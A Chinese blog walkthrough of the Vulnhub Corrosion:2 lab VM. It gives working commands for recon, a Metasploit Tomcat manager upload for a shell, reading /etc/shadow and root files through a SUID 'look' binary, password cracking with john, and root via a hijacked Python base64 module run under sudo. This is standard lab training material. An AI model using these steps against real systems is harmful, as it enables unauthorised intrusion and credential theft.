看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2

简介: 看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。



这是一个漏洞靶机,老样子需要找到flag即可。

Difficulty: Medium

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/corrosion/Corrosion2.ova



Vulnhub靶机安装:

下载好了把安装包解压 然后使用VMware打开即可。


Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机



使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.100

渗透机:kali IP :192.168.0.104 靶机IP :192.168.0.100

开启了22、80、8080端口 8080发现开启了tomcat服务
老样子访问80端口(Apache默认页面)进行扫描:dirb、dirsearch、whatweb、gobuster、nikto

dirsearch -u http://192.168.0.100  #没有可以利用的信息(一般没有可以利用信息就扫二级目录)
dirsearch -u http://192.168.0.100:8080 #这波信息收集得到了backup.zip和readme.txt文件
gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip  #没有可以利用的信息
gobuster dir -u http://192.168.0.100:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 400,404 
whatweb



4e06a0df98304a669321687dfb8e660e.png

ebd15a33d18244eb8cdf1551cc34bfaf.png


0c73a851059e4a9eb7da90ea808727f9.png


得到一个账号:randy 下载backup.zip发现需要密码尝试爆破和Corrosion1一样 得到密码:@administrator_hi5

可以参考Corrosion系列第一篇有详细方法:http://t.csdn.cn/XmjAR




aef9757067ee4759ae413255df82777f.png

11b053be6b8c46b591bfe8fb88e55d22.png


查看配置文件 tomcat-users.xml,找到两组账户密码分别为:manager/melehifokivaiadmin/melehifokivai尝试登入,登入成功!

②:Tomcat msf 上传漏洞拿到shell:

打开msfconsole控制台使用模块:use exploit/multi/http/tomcat_mgr_upload 设置参数

set RHOST 192.168.0.100
set HttpPassword  melehifokivai
set HttpUsername  manager
set RPORT  80  
run


0514c884af5d46248fc612429687f6a9.png

bb63bd9a76134282b41360c631ccacf8.png

切换Shell,家里面下面三个用户jaye没权限进入randy用户查看user.txt得到第一个flag!


828ee7d6ed04401987fd8bce3a895c04.png

尝试切换jaye用户,试了一下tomcat的密码 进去了神奇! 使用python获取终端:python3 -c 'import pty;pty.spawn("/bin/bash")'


cat /etc/passwd 发现有ssh 那我们就切换使用ssh登入这样操作方便点!


使用命令查看有root可以执行的命令:find / -perm -u=s -type f 2>/dev/null


③:look越权操作:

这里发现了一个look命令可以使用(第一次使用,不会啊~)看不了没权限 运行./look '' "$LFILE"查看的

文件名即可。


look越权命令使用方法:https://gtfobins.github.io/gtfobins/look/



其实这里直接可以使用这个越权命令查看root文件了 ./look '' /root/root.txt

查看/etc/shadow/ect/passwd文件,unshadow命令生成需要破解的密码全部复制然后john进行爆破


(必须要复制两个文件的全部内容不然出不来)字典是:rockyou.txt(时间比较久!!)

unshadow passwd shadow > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt  

c60a1042c0b84fecb6750cfe5e7b3df3.png


1e06cbe4aca84976bda6325046220722.png

得到randy得密码为:07051986randy

④:sudo执行Base64.py提权

登入成功后信息收集一波:id,whoami,sudo-l 发现可以执行randombase64这个py脚本



5c673142ff784bbab0f68e368706c6c3.png

我们直接在python程序 base64 模块里面写入shell先找到这个脚本然后使用vi或者nano编辑器 ctrl+X 推出(第一次用搞半天)

cd /usr/lib/python3.8
ls -al base*  #找到base64.py 写入下面得内容
import os
os.system("bin/bash")
sudo /usr/bin/python3.8  /home/randy/randombase64.py #运行即可 因为使用得是pyton3.8 也可以尝试别的成功即可!!

592e7087823d402492dc1d0eba88f0d1.png


a352292c06b64060b4d5254fdba7b17e.png


e434a05a16a449e68b6461f5d6716be2.png

⑤:获取LFAGL:

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!


Vulnhub靶机渗透总结:

这个靶机难度中偏上 因为比较麻烦


1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等 查看F12源码信息

2.MSF exploit/multi/http/tomcat_mgr_upload模块getshell(要知道账号密码)

3.zip2john爆破和fcrackzip(爆破压缩包工具)还有john报错解决方法(新知识点!)

4.look命令越权读取文件 ./look '' 文件名即可

5.unshadow用户密码破解工具(第一次用 新工具!!)

6.sudo 提权执行base64.py写入shell提权

7.Linux Polkit 权限提升漏洞 CVE-2021-4034(太晚了睡觉了这里就先不演示了大家可以了解一下)


Corrosion系列完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)

最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
4月前
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
102 0
|
4月前
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
48 0
|
4月前
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
37 0
|
4月前
|
安全 Oracle 机器人
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
47 0
|
4月前
|
SQL 安全 Oracle
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
55 0
|
5月前
|
安全 Linux 测试技术
如何使用Kali Linux进行渗透测试?
如何使用Kali Linux进行渗透测试?
202 0
|
30天前
|
网络协议 网络安全 Go
Kali下安装渗透测试常用工具dnsx和dirsearch
Kali下安装渗透测试常用工具dnsx和dirsearch
23 0
|
30天前
|
安全 Linux 测试技术
深入Kali Linux:高级渗透测试技术详解
深入Kali Linux:高级渗透测试技术详解
59 0
|
数据采集 存储 Linux
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
2022-渗透测试-Kali Linux字典生成工具Cewl使用指南
|
Web App开发 Java 测试技术
kali linux 网络渗透测试学习笔记(三)社会工程学之Java攻击:钓鱼网站制作
一.进入kali linux系统的命令行模式 输入代码; ifconfig 查看获得本机IP地址为:192.168.43.227 然后输入代码:   setoolkit   出现以下界面:       在set后输入1. 二.开始重复输入数字代号 三.写入钓鱼网站的目标 正如下图所示,我们需要先输入本机的IP地址以及端口,之后输入钓鱼网站的网址,这里我们以百度为例,因此输入https://www.baidu.com。
2240 0